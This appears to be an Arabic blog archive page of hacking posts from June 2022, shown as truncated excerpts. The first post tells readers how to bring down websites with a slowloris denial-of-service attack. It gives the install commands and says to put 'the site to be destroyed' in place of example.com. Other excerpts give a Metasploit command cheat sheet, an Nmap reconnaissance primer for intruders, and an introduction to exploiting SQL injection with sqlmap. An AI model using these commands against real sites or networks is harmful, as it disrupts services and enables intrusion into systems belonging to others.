المشاركات

عرض المشاركات من يونيو, 2022

كيفيه اسقاط المواقع بهجوم حجب الخدمه عن السيرفرات

  كيفيه اسقاط المواقع بهجوم حجب الخدمه عن السيرفرات  طريقتان لتنزيل الاداه في termux ◄ الطريقة الاولى  git clone https://github.com/gkbrk/slowloris.git cd slowloris تشغيل الاداه نضع الموقع المراد تدميره بدل example.com ⌘ python3 slowloris.py example.com ◄ الطريقة الثانيه حيث تكون الاداه اساسيه في termux  pip3 install slowloris تشغيل الاداه نضع الموقع المراد تدميره بدل example.com  slowloris example.com

مشروع اختبار الاختراق في Metasploit لي الكمبيوتر والاندرويد

  مشروع Metasploit هو مشروع أمان كمبيوتر يوفر معلومات عن نقاط الضعف ، ويساعد في تطوير اختبارات الاختراق وتوقيعات نظام كشف التسلل. Metasploit هي أداة شائعة يستخدمها خبراء pentest. لقد أعددت وثيقة لتتعلمها. ميتاسبلويت: البحث عن وحدة: msf > search [regex] حدد واستغل لاستخدام: msf > use exploit/[ExploitPath] حدد حمولة لاستخدامها: msf > set PAYLOAD [PayloadPath] إظهار الخيارات للوحدات النمطية الحالية: msf > show options ضبط الخيارات: msf > set [Option] [Value] ابدأ الاستغلال: msf > exploit  وحدات مساعدة مفيدة ماسح المنفذ: msf > use auxiliary/scanner/portscan/tcp msf > set RHOSTS 10.10.10.0/24 msf > run تعداد DNS: msf > use auxiliary/gather/dns_enum msf > set DOMAIN target.tgt msf > run خادم بروتوكول نقل الملفات: msf > use auxiliary/server/ftp msf > set FTPROOT /tmp/ftproot msf > run مخدم بروكسي: msf > use auxiliary/server/socks4 msf > run  msfvenom: يمكن استخدام أداة msfvenom لإنشاء حمولات Metasploit (مثل Meterpreter) كملفات ق...

استطلاع الشبكة للمبتدئين بعد الوصول إلى شبكة Wi-Fi أو Ethernet أو شبكة بعيدة ، فإن الخطوة الأولى لمعظم

 استطلاع الشبكة للمبتدئين بعد الوصول إلى شبكة Wi-Fi أو Ethernet أو شبكة بعيدة ، فإن الخطوة الأولى لمعظم المتسللين هي إجراء إعادة لاستكشاف الشبكة ومعرفة المزيد حول أي أهداف متاحة. قد تكون على دراية ببعض الأجهزة التي تعلن عن نفسها على الشبكة ، مثل أجهزة الكمبيوتر الأخرى التي تعلن عن مشاركة الملفات. في حين أن هذه طريقة مفيدة لاكتشاف الأجهزة الموجودة على نفس الشبكة مثلك ، إلا أن معظم الأجهزة لا تعلن عن وجودها على الشبكة بهذه الطريقة الواضحة. حل مشكلة استكشاف الشبكة هو فحص الشبكة ، الذي أصبح ممكنًا بفضل برامج مثل Nmap و arp-scan . نحن مهتمون فقط بالأول هنا ، والذي يسمح باستكشاف مفصل للغاية ورسم خرائط للشبكات المحلية والبعيدة ، على الرغم من أنه يمكننا استخدام Nmap لإجراء فحص ARP كما سترى لاحقًا. باستخدام Nmap ، يمكنك معرفة من هو على الشبكة ، والتطبيقات أو نظام التشغيل الذي يعمل على الهدف ، وما هو سطح الهجوم المتاح. لا تفوت: أفضل 5 برامج نصية متطفلة لـ Nmap يجب أن يعرفها المتسللون والمخترقون استخدام Nmap للشبكات المحلية غالبًا ما يكون إجراء فحص Nmap هو أفضل طريقة لاكتشاف حجم الشبكة وعدد ا...

أوامر اختراق الموقع عن طريق اداة SQLMAP لاستغلال حقن SQL

 أوامر اختراق الموقع عن طريق اداة SQLMAP لاستغلال حقن SQL لغة الاستعلامات الهيكلية ، والتي تُعرف باسم SQL ، هي لغة البرمجة الشائعة التي تسطرها معظم أنظمة إدارة قواعد البيانات. يوفر طريقة شائعة للتطبيق للوصول إلى البيانات الموجودة في قاعدة البيانات باستخدام مجموعة مشتركة من الأوامر التي يمكن لقاعدة البيانات فهمها. يستغل المهاجمون قواعد البيانات هذه بجعلهم يخرجون معلومات لا ينبغي لهم عرضها. أحيانًا يكون هذا بسيطًا مثل المهاجم الذي يطلب معلومات مميزة من نظام إدارة قاعدة البيانات . في أحيان أخرى ، يستفيد من التكوينات الضعيفة من قبل مسؤولي قواعد البيانات. من الاستطلاع إلى تغطية المسارات - 5 مراحل للقرصنة الأخلاقية من الألف إلى الياء - مؤشر ثغرات الويب - معيار OWASP من الألف إلى الياء - مجموعة أدوات الأمن السيبراني قد يستفيد المهاجمون أيضًا من ثغرة أمنية في نظام إدارة قاعدة البيانات تسمح للمهاجم بعرض أو كتابة أوامر مميزة من قاعدة البيانات وإليها. تقوم Sqlmap بأتمتة عملية اكتشاف واستغلال الثغرات الأمنية لحقن SQL والاستيلاء على خوادم قواعد البيانات. يأتي Sqlmap مزودًا بمحرك كشف ، بالإضافة ...